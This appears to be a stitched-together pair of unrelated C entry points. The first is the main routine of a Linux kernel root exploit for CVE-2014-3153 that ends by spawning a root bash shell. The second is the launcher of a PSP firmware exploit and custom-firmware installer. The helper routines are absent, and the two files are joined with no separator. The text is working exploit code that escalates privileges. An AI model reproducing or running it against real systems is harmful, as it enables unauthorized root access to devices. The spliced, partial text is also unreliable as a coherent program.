int main(int argc, char *argv[])
{
unsigned long mapped_address;
void *waiter_plist;
printf("CVE-2014-3153 exploit by Chen Kaiqu([email protected])\n");
main_pid = gettid();
if(fork() == 0) {
iov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, /*MAP_POPULATE |*/ MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
if (iov_base0 < 0xb0000000) {
printf("mmap failed?\n");
return 1;
}
iov_len0 = 0x10000;
iov_basex = (unsigned long)mmap((void *)MMAP_ADDR_BASE, MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
if (iov_basex < MMAP_ADDR_BASE) {
printf("mmap failed?\n");
return 1;
}
iov_lenx = MMAP_LEN;
waiter_plist = (void *)iov_basex + 0x400;
pthread_create(&thread_client_to_setup_rt_waiter, NULL, client_to_setup_rt_waiter, waiter_plist);
sockfd = server_for_setup_rt_waiter();
if (sockfd < 0) {
printf("Server failed\n");
return 1;
}
if (!do_exploit(waiter_plist)) {
return 1;
}
return 0;
}
while(getuid())
usleep(100);
execl("/bin/bash", "bin/bash", NULL);
return 0;
}
//entry point
int main(int argc, char * argv[])
{
pspDebugScreenInit();
psp_fw_version = sceKernelDevkitVersion();
#if defined(CONFIG_660) || defined(CONFIG_661)
if((psp_fw_version == FW_660) || (psp_fw_version == FW_661)) {
goto version_OK;
}
#endif
#ifdef CONFIG_639
if(psp_fw_version == FW_639) {
goto version_OK;
}
#endif
#ifdef CONFIG_620
if(psp_fw_version == FW_620) {
goto version_OK;
}
#endif
#ifdef CONFIG_635
if(psp_fw_version == FW_635) {
goto version_OK;
}
#endif
pspDebugScreenPrintf("Sorry. This program doesn't support your FW(0x%08X).\n", (uint)psp_fw_version);
sceKernelDelayThread(5*1000000);
goto exit;
version_OK:
setup_patch_offset_table(psp_fw_version);
//puzzle installer path
strcpy(installerpath, argv[0]);
char * slash = strrchr(installerpath, '/');
if (slash) slash[1] = '\0';
write_files(installerpath);
strcat(installerpath, "installer.prx");
printk_init("ms0:/launcher.txt");
printk("Hello exploit\n");
if(sctrlHENGetVersion() >= 0) {
install_in_cfw();
return 0;
}
#if defined(CONFIG_660) || defined(CONFIG_661)
if((psp_fw_version == FW_660) || (psp_fw_version == FW_661)) {
do_exploit_660();
}
#endif
#ifdef CONFIG_639
if(psp_fw_version == FW_639) {
do_exploit_639();
}
#endif
#if defined(CONFIG_620) || defined(CONFIG_635)
if(psp_fw_version == FW_620 || psp_fw_version == FW_635) {
do_exploit();
}
#endif
exit:
//trigger reboot
sceKernelExitGame();
//kill thread
sceKernelExitDeleteThread(0);
//return
return 0;
}
